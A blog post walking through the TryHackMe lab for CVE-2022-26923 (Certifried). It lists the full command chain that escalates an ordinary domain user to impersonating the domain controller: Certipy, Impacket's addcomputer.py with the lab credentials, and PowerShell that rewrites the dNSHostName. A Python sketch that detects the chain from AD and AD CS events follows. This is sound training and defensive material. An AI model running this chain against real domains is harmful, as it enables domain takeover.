DEV Community

a.infosecflavour

CVE-2022-26923 | TryHackMe

Hello!

Today we'll be covering CVE-2022-26923 (the Active Directory Certificate Services privilege escalation known as "Certifried").

CVSS v3
Base score: 8.8
Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Severity: High

Welcome to the CVE-2022-26923 TryHackMe walkthrough. Today I decided to learn about Active Directory Certificate Services (AD CS), and this walkthrough was a great occasion to do so. I discovered Certipy and practiced with nmap and Impacket's addcomputer.py.

🔗 Link to the walkthrough: https://tryhackme.com/r/room/cve202226923

🟡 Difficulty: Easy

⚙️ Tools: nmap, Certipy, Impacket's addcomputer.py, ssh, PowerShell (Active Directory module)

💭 Note: $Target_IP = the machine's IP
Certain screenshots were intentionally omitted. I really encourage you to drop a comment should you need support or just to say print("Hello world"). 😄

On my GitHub you'll find more info about Microsoft ADCS.


🪜 Steps I followed (after deploying the machine):

Add the DC's DNS name (lundc.lunar.eruca.com) and the machine IP to /etc/hosts

Run an nmap scan
nmap -A -Pn $Target_IP


Ports 88 and 389 are open.

  • 88 is Kerberos, the domain's authentication service; this is the port certipy auth talks to when it turns a certificate into a TGT (PKINIT).

  • 389 is LDAP, used to read and write directory objects. Traffic on this port is plaintext unless the client negotiates StartTLS; LDAPS on 636 is the TLS-wrapped alternative, which is why addcomputer.py is run below with -method LDAPS.

Get the Enterprise CA name
certipy find -u thm@lunar.eruca.com -p Password1@ -dc-ip $Target_IP


Test certificate generation

certipy req -username thm@lunar.eruca.com -password Password1@ -ca LUNAR-LUNDC-CA -target $Target_IP


Verify that this certificate is valid and can be used for Kerberos authentication

certipy auth -pfx thm.pfx

Add a computer to the domain (any domain user can do this while ms-DS-MachineAccountQuota is at its default of 10)

python3 addcomputer.py 'lunar.eruca.com/thm:Password1@' -method LDAPS -computer-name 'THMPC' -computer-pass 'Password1@' -dc-ip $Target_IP


Generate a certificate for the newly created computer

certipy req -username 'THMPC$@lunar.eruca.com' -password Password1@ -ca LUNAR-LUNDC-CA -target $Target_IP -template Machine

Verify that the certificate is valid

certipy auth -pfx thmpc.pfx

SSH into the machine

ssh lunar.eruca.com\\thm@lundc

Start PowerShell

powershell

Get the current attributes from our Computer AD Object

Get-ADComputer THMPC -properties dnshostname,serviceprincipalname

Clear the ServicePrincipalName attribute first: the existing SPNs embed THMPC's hostname, and AD would rewrite them to the new hostname, which collides with the DC's own SPNs and makes the DNS hostname update fail with a constraint violation

Set-ADComputer THMPC -ServicePrincipalName @{}

Set the DNS hostname attribute to that of the DC

Set-ADComputer THMPC -DnsHostName LUNDC.lunar.eruca.com

Verify that the changes were made

Get-ADComputer THMPC -properties dnshostname,serviceprincipalname

Request a certificate that impersonates the DC (the Machine template builds the certificate's subject from the requesting computer's dNSHostName, which now says LUNDC):

  • Request a new certificate

certipy req -username 'THMPC$@lunar.eruca.com' -password Password1@ -ca LUNAR-LUNDC-CA -target lundc.lunar.eruca.com -template Machine


  • Verify the certificate

certipy auth -pfx lundc.pfx


And we have the flag!
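The two attacker steps above that actually matter (rewriting THMPC's dNSHostName, then requesting a Machine certificate for that name) are also what a defender can alert on. The following detection sketch is an added example and is not part of the TryHackMe room, Certipy or Impacket; its events are constructed dicts whose field names are modeled on Windows Security events 5136 (directory object modified) and 4887 (AD CS issued a certificate). Those shapes are assumptions, not a parser for real EVTX, and the account and host names are the room's.

```python
"""Detection sketch for the Certifried (CVE-2022-26923) chain, added as an
example; it is not part of the TryHackMe room, Certipy or Impacket.

Two attacker steps leave events on the DC:
  * 5136 (directory service object modified): thm rewrites THMPC's
    dNSHostName to LUNDC.lunar.eruca.com (Set-ADComputer -DnsHostName)
  * 4887 (AD CS issued a certificate): THMPC$ is issued a Machine-template
    certificate whose subject is built from that rewritten dNSHostName
Events are constructed for this example as flat dicts; the field names are
modeled on those event IDs but are assumptions, not a parser for real EVTX.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Alert:
    event_id: int
    account: str       # computer whose identity is involved (no trailing $)
    claimed_host: str  # host name that account is claiming to be
    reason: str


def host_label(value: str) -> str:
    """Short host name from any of the forms seen in the events:
    'LUNAR\\THMPC$' -> 'THMPC', 'CN=LUNDC.lunar.eruca.com' -> 'LUNDC',
    'CN=THMPC,CN=Computers,DC=lunar,...' -> 'THMPC'."""
    v = value.strip()
    if "\\" in v:                      # DOMAIN\name
        v = v.split("\\", 1)[1]
    if v.upper().startswith("CN="):    # certificate subject or object DN
        v = v[3:].split(",", 1)[0]
    v = v.rstrip("$")                  # machine account suffix
    return v.split(".", 1)[0].upper()  # first DNS label only


def check_cert_issued(ev: Dict[str, str]) -> Optional[Alert]:
    """4887: a machine account obtained a Machine certificate whose subject
    names a different host than the requester itself."""
    requester = ev.get("Requester", "")
    if not requester.endswith("$"):
        return None                    # user templates are out of scope here
    if "CertificateTemplate:Machine" not in ev.get("Attributes", ""):
        return None
    own, claimed = host_label(requester), host_label(ev.get("Subject", ""))
    if claimed and claimed != own:
        return Alert(4887, own, claimed,
                     f"{requester} was issued a Machine certificate for {claimed}")
    return None


def check_dnshostname_write(ev: Dict[str, str]) -> Optional[Alert]:
    """5136: dNSHostName written on a computer object with a value whose
    first label is not that object's own name."""
    if ev.get("AttributeLDAPDisplayName", "").lower() != "dnshostname":
        return None
    own = host_label(ev.get("ObjectDN", ""))
    claimed = host_label(ev.get("AttributeValue", ""))
    if claimed and claimed != own:
        writer = ev.get("SubjectUserName", "?")
        return Alert(5136, own, claimed,
                     f"{writer} set dNSHostName of {own}$ to {ev.get('AttributeValue')}")
    return None


CHECKS = {4887: check_cert_issued, 5136: check_dnshostname_write}


def scan(events) -> List[Alert]:
    """Run the per-event checks and keep every alert, in event order."""
    alerts = []
    for ev in events:
        check = CHECKS.get(ev.get("EventID"))
        alert = check(ev) if check else None
        if alert:
            alerts.append(alert)
    return alerts


def correlate(alerts) -> List[Tuple[str, str]]:
    """High-confidence hits: a dNSHostName rewrite followed by a certificate
    issuance for the same account and claimed host (the full chain)."""
    rewrites = set()
    hits: List[Tuple[str, str]] = []
    for a in alerts:
        key = (a.account, a.claimed_host)
        if a.event_id == 5136:
            rewrites.add(key)
        elif a.event_id == 4887 and key in rewrites and key not in hits:
            hits.append(key)
    return hits


# Constructed sample events for this example (not captured logs).
SAMPLE_EVENTS = [
    {"EventID": 4887, "Requester": "LUNAR\\LUNDC$",      # DC renews its own cert: benign
     "Subject": "CN=LUNDC.lunar.eruca.com", "Attributes": "CertificateTemplate:Machine"},
    {"EventID": 5136, "SubjectUserName": "LUNDC$",        # DC writes its own dNSHostName: benign
     "ObjectDN": "CN=LUNDC,OU=Domain Controllers,DC=lunar,DC=eruca,DC=com",
     "AttributeLDAPDisplayName": "dNSHostName", "AttributeValue": "LUNDC.lunar.eruca.com"},
    {"EventID": 5136, "SubjectUserName": "thm",           # walkthrough step: Set-ADComputer -DnsHostName
     "ObjectDN": "CN=THMPC,CN=Computers,DC=lunar,DC=eruca,DC=com",
     "AttributeLDAPDisplayName": "dNSHostName", "AttributeValue": "LUNDC.lunar.eruca.com"},
    {"EventID": 4887, "Requester": "LUNAR\\THMPC$",       # walkthrough step: certipy req -template Machine
     "Subject": "CN=LUNDC.lunar.eruca.com", "Attributes": "CertificateTemplate:Machine"},
]

if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for a in found:
        print(f"[{a.event_id}] {a.reason}")
    print("Certifried chain confirmed for:", correlate(found))
```

Neither event is logged by default: 4887 needs the "Audit Certification Services" subcategory and the CA's own audit filter enabled, and 5136 needs "Audit Directory Service Changes" plus a SACL on the computer objects. The May 2022 patch makes the CA embed the requester's SID in the issued certificate so the KDC no longer maps it by dNSHostName alone, but the two events the chain produces look the same on a patched DC, so the correlation still works as a signal that someone is trying.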
